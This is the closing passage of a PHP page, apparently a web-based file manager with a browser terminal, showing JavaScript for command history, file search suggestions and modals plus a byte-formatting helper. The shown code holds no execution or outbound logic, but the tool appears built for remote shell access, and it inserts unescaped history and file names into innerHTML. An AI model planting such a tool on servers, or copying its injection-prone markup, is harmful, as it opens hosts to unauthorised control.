                        historyIndex--;
                    }
                    terminalCommand.value = commandHistory[historyIndex] || "";
                }
            } else if (e.key === "ArrowDown") {
                e.preventDefault();
                if (historyIndex < commandHistory.length - 1) {
                    historyIndex++;
                    terminalCommand.value = commandHistory[historyIndex] || "";
                } else {
                    historyIndex = commandHistory.length;
                    terminalCommand.value = "";
                }
            } else if (e.key === "Tab") {
                e.preventDefault();
            }
        });
        
        terminalCommand.addEventListener("input", function() {
            const value = this.value;
            const historyDiv = document.getElementById("terminalHistory");
            
            if (value.trim()) {
                const filtered = commandHistory.filter(cmd => 
                    cmd.toLowerCase().includes(value.toLowerCase())
                ).slice(0, 5);
                
                if (filtered.length > 0) {
                    historyDiv.innerHTML = filtered.map(cmd => 
                        `<div class="history-item" onclick="useHistoryCommand(\'${cmd.replace(/\'/g, "\\\\\'")}\')">${cmd}</div>`
                    ).join("");
                    historyDiv.style.display = "block";
                } else {
                    historyDiv.style.display = "none";
                }
            } else {
                historyDiv.style.display = "none";
            }
        });
        
        terminalCommand.addEventListener("blur", function() {
            setTimeout(() => {
                document.getElementById("terminalHistory").style.display = "none";
            }, 200);
        });
    }
    
    window.useHistoryCommand = function(command) {
        const terminalCommand = document.getElementById("terminalCommand");
        terminalCommand.value = command;
        terminalCommand.focus();
        document.getElementById("terminalHistory").style.display = "none";
    };
    
    if (searchInput) {
        searchInput.addEventListener("input", function() {
            const query = this.value.trim();
            if (query.length < 2) {
                searchSuggestions.style.display = "none";
                return;
            }
            
            if (query !== lastSearchQuery) {
                lastSearchQuery = query;
                fetchSearchSuggestions(query);
            }
        });
        
        searchInput.addEventListener("focus", function() {
            if (this.value.trim().length >= 2) {
                fetchSearchSuggestions(this.value.trim());
            }
        });
        
        document.addEventListener("click", function(e) {
            if (!searchInput.contains(e.target) && !searchSuggestions.contains(e.target)) {
                searchSuggestions.style.display = "none";
            }
        });
    }
    
    function fetchSearchSuggestions(query) {
        const fileItems = document.querySelectorAll(\'.file-item\');
        const suggestions = [];
        
        fileItems.forEach(item => {
            const name = item.dataset.name || "";
            const path = item.dataset.path || "";
            const type = item.dataset.type || "";
            
            if (name.toLowerCase().includes(query.toLowerCase()) || 
                path.toLowerCase().includes(query.toLowerCase())) {
                suggestions.push({
                    name: name,
                    path: path,
                    type: type
                });
            }
        });
        
        if (suggestions.length > 0) {
            searchSuggestions.innerHTML = "";
            suggestions.slice(0, 10).forEach(suggestion => {
                const div = document.createElement("div");
                div.className = "suggestion-item";
                div.innerHTML = `<strong>${suggestion.name}</strong> <span style="color:var(--text-secondary); font-size:11px">(${suggestion.type === \'dir\' ? \'📁 Directory\' : \'📄 File\'})</span>`;
                div.addEventListener("click", function() {
                    searchInput.value = suggestion.name;
                    searchSuggestions.style.display = "none";
                    scrollToFile(suggestion.path);
                });
                searchSuggestions.appendChild(div);
            });
            searchSuggestions.style.display = "block";
        } else {
            searchSuggestions.style.display = "none";
        }
    }
    
    if (document.querySelector(".message")) {
        setTimeout(() => {
            document.querySelectorAll(".message").forEach(msg => {
                msg.style.opacity = "0";
                msg.style.transition = "opacity 0.5s";
                setTimeout(() => msg.remove(), 500);
            });
        }, 5000);
    }
    
    scrollTerminalToBottom();
    resizeTerminal();
    
    commandHistory = ' . (isset($_SESSION['terminal_history']) ? json_encode($_SESSION['terminal_history']) : '[]') . ';
    
    updateBatchControls();
});
window.addEventListener("resize", function() {
    resizeTerminal();
});
document.addEventListener("keydown", function(e) {
    if (e.key === "Escape") {
        document.querySelectorAll(".modal").forEach(modal => {
            modal.style.display = "none";
            document.body.style.overflow = "auto";
        });
    }
});
document.querySelectorAll(".modal").forEach(modal => {
    modal.addEventListener("click", function(e) {
        if (e.target === this) {
            this.style.display = "none";
            document.body.style.overflow = "auto";
        }
    });
});
document.addEventListener("touchstart", function() {}, {passive: true});
document.addEventListener("touchmove", function() {}, {passive: true});
</script>
</body>
</html>';

function formatBytes($bytes, $precision = 2) {
    $units = array('B', 'KB', 'MB', 'GB', 'TB');
    $bytes = max($bytes, 0);
    $pow = floor(($bytes ? log($bytes) : 0) / log(1024));
    $pow = min($pow, count($units) - 1);
    $bytes /= pow(1024, $pow);
    return round($bytes, $precision) . ' ' . $units[$pow];
}
?>